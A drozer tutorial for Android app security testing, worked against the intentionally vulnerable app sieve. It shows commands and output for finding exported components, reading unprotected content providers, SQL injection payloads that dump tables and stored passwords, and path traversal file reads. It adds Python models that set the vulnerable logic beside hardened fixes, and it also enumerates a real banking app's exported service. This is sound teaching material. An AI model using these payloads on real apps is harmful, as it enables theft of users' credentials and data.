Github Drozer
drozer guide

Installation

  1. Install drozer-agent-x.x.x.apk and start the embedded server; by default it listens on port 31415.
  2. Forward port 31415 with adb: adb forward tcp:31415 tcp:31415
  3. Connect to the device with drozer console connect.

Usage

1. List the package names of all apps installed on the Android device

run app.package.list; you can also filter by keyword with -f key, for example run app.package.list -f sieve

2. Get the basic information of an app; the argument is its package name

run app.package.info -a packageName

dz> run app.package.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Process Name: com.mwr.example.sieve
Version: 1.0
Data Directory: /data/data/com.mwr.example.sieve
APK Path: /data/app/com.mwr.example.sieve-2.apk
UID: 10056
GID: [1028, 1015, 3003]
Shared Libraries: null
Shared User ID: null
Uses Permissions:
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
- android.permission.INTERNET
Defines Permissions:
- com.mwr.example.sieve.READ_KEYS
- com.mwr.example.sieve.WRITE_KEYS

This shows the app's version, its data directory, user ID and group IDs, whether it uses shared libraries, and the permissions it uses and defines.

3. Identify the attack surface

run app.package.attacksurface packageName

dz> run app.package.attacksurface com.mwr.example.sieve
Attack Surface:
3 activities exported
0 broadcast receivers exported
2 content providers exported
2 services exported
is debuggable

This shows the number of components that could potentially be abused: "exported" means the component can be invoked by other apps, and "is debuggable" means a debugger can be attached to the process through adb.

4. Get more detail about the attack surface

run app.activity.info -a packageName

dz> run app.activity.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
com.mwr.example.sieve.FileSelectActivity
com.mwr.example.sieve.MainLoginActivity
com.mwr.example.sieve.PWList

5. Start activities

run app.activity.start --component packageName activityName

dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList

dz> help app.activity.start
usage: run app.activity.start [-h] [--action ACTION] [--category CATEGORY [CATEGORY ...]]
[--component PACKAGE COMPONENT] [--data-uri DATA_URI]
[--extra TYPE KEY VALUE] [--flags FLAGS [FLAGS ...]]
[--mimetype MIMETYPE]

Starts an Activity using the formulated intent.

6. Get information from content providers

run app.provider.info -a packageName

dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Authority: com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Type: PATTERN_LITERAL
Read Permission: com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS
Authority: com.mwr.example.sieve.FileBackupProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False

This is the detail of the two exported content providers: their names, the permissions they require, and the paths that carry their own permissions.

7. Find content provider URIs that can be queried (data leakage)

run scanner.provider.finduris -a packageName

dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/

This lists the content URIs that can be queried without any permission. Next we can use drozer's other modules with these URIs to read, or even modify, the provider's data.

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w== (Base64-encoded)
email: incognitoguy50@gmail.com

We obtained the username, the email account, and the Base64-encoded password string.

8. SQL injection

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
unrecognized token: "' FROM Passwords" (code 1): , while compiling: SELECT ' FROM Passwords
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')

After these commands the Android device returned very detailed error messages: the single quote we supplied appears verbatim inside the SQL being compiled.

9. Use SQL injection to list all tables in the database

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
| type | name | tbl_name | rootpage | sql |
| table | android_metadata | android_metadata | 3 | CREATE TABLE ... |
| table | Passwords | Passwords | 4 | CREATE TABLE ... |
| table | Key | Key | 5 | CREATE TABLE ... |

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
| Password | pin |
| thisismypassword | 9876 |
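The errors in section 8 and the table listing in section 9 both come from a provider that pastes the caller's projection and selection straight into its SQL. The following Python model is added here and is not code from the guide, from sieve or from drozer: it rebuilds that query path over a constructed SQLite database and puts the hardened form beside it (an allowlisted projection and a selection restricted to a bound "column = ?"), which is the same rule an Android provider's query() should enforce before it reaches SQLiteDatabase. The schema, rows and function names are constructed for illustration.

```python
import re
import sqlite3

PASSWORD_COLUMNS = ("_id", "service", "username", "password", "email")  # constructed allowlist
SAFE_SELECTION = re.compile(r"^\s*(\w+)\s*=\s*\?\s*$")  # only "<column> = ?" is accepted

def make_db():
    """Constructed stand-in for sieve's database (schema and rows are made up)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Passwords(_id INTEGER PRIMARY KEY, service, username, password, email)")
    db.execute("CREATE TABLE Key(Password, pin)")
    db.execute("INSERT INTO Passwords VALUES (1, 'Email', 'incognitoguy50', 'PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==', 'incognitoguy50@gmail.com')")
    db.execute("INSERT INTO Key VALUES ('thisismypassword', 9876)")
    return db

def vulnerable_query(db, projection, selection=None, args=()):
    """Concatenates caller text into the SQL: this is why --projection and --selection inject."""
    sql = "SELECT " + ", ".join(projection) + " FROM Passwords"
    if selection:
        sql += " WHERE (" + selection + ")"
    return db.execute(sql, args).fetchall()

def hardened_query(db, projection, selection=None, args=()):
    """Allowlists projected columns, accepts only '<column> = ?' and binds the value."""
    for column in projection:
        if column not in PASSWORD_COLUMNS:
            raise ValueError("column not allowed in projection: %r" % column)
    sql = "SELECT " + ", ".join(projection) + " FROM Passwords"
    if selection:
        match = SAFE_SELECTION.match(selection)
        if not match or match.group(1) not in PASSWORD_COLUMNS:
            raise ValueError("selection not allowed: %r" % selection)
        sql += " WHERE " + match.group(1) + " = ?"
    return db.execute(sql, args).fetchall()

def demo():
    """Shows the page's projection payloads leaking data, and the hardened path serving a normal query."""
    db = make_db()
    return {
        # The trailing comment discards the provider's own " FROM Passwords".
        "key_rows": vulnerable_query(db, ["* FROM Key --"]),
        "tables": sorted(r[1] for r in vulnerable_query(db, ["* FROM sqlite_master WHERE type='table' --"])),
        "legit": hardened_query(db, ["service", "username"], "service = ?", ("Email",)),
    }
```

Feeding the same payloads to hardened_query raises ValueError before any SQL is built, and a stray quote in the selection is rejected by the shape check rather than reaching SQLite.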

10. Get information from file-system-backed content providers

A file-system-backed content provider offers a way to access the underlying file system. The Android sandbox normally prevents apps from sharing files; a file-system-backed content provider is how an app exposes files to others. For sieve, we can infer that FileBackupProvider is such a provider. We can use drozer's app.provider.read module to view a file, or app.provider.download to download one.

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db

11. Check content providers for vulnerabilities

Check for SQL injection: run scanner.provider.injection -a packageName
Check for directory traversal: run scanner.provider.traversal -a packageName

dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider
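The traversal finding above, like the read of /etc/hosts in section 10, reflects a provider that opens the URI path as a filesystem path. As an added example that is not part of the guide, sieve or drozer, this Python model places that resolver beside a hardened one that confines every request to a backup directory by canonicalising the path and checking it stays under the root; BACKUP_ROOT, the function names and the sample URIs are constructed.

```python
import os
from urllib.parse import urlsplit

# Constructed: the directory a backup provider is meant to expose (hypothetical path).
BACKUP_ROOT = "/data/data/com.mwr.example.sieve/files/backup"

def path_from_uri(content_uri):
    """content://<authority>/<path> -> '/<path>', the part drozer's read/download modules send."""
    return urlsplit(content_uri).path

def vulnerable_resolve(uri_path):
    """Mirrors a provider that opens the URI path as an absolute filesystem path,
    which is how content://.../FileBackupProvider/etc/hosts returned /etc/hosts."""
    return os.path.normpath(uri_path)

def hardened_resolve(backup_root, uri_path):
    """Treats the URI path as relative to the backup directory, canonicalises it
    (resolving '..' and symlinks) and refuses anything that lands outside."""
    root = os.path.realpath(backup_root)
    target = os.path.realpath(os.path.join(root, uri_path.lstrip("/")))
    if os.path.commonpath([root, target]) != root:
        raise PermissionError("URI path escapes the backup directory: %r" % uri_path)
    return target

def check(content_uri):
    """Returns (path the vulnerable provider opens, path relative to BACKUP_ROOT that the
    hardened provider serves, or None when it refuses the request)."""
    uri_path = path_from_uri(content_uri)
    opened = vulnerable_resolve(uri_path)
    try:
        target = hardened_resolve(BACKUP_ROOT, uri_path)
        served = os.path.relpath(target, os.path.realpath(BACKUP_ROOT))
    except PermissionError:
        served = None
    return opened, served
```

A symlink inside the backup directory that points elsewhere is caught by the same check, because realpath follows it before the root comparison.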

12. Interact with services

Command to list exported services: run app.service.info -a packageName

dz> run app.service.info -a com.bank.pingan
Package: com.bank.pingan
com.pingan.bank.apps.cejmodule.services.StatisticsService
Permission: null

13. Send a message to a service

run app.service.send packageName serviceName --msg 1 5 3

14. Other commonly used modules

shell.start                                  Start an interactive Linux shell on the Android device
tools.file.upload / tools.file.download      Upload files to, or download files from, the Android device
tools.setup.busybox / tools.setup.minimalsu  Install busybox or minimalsu on the Android device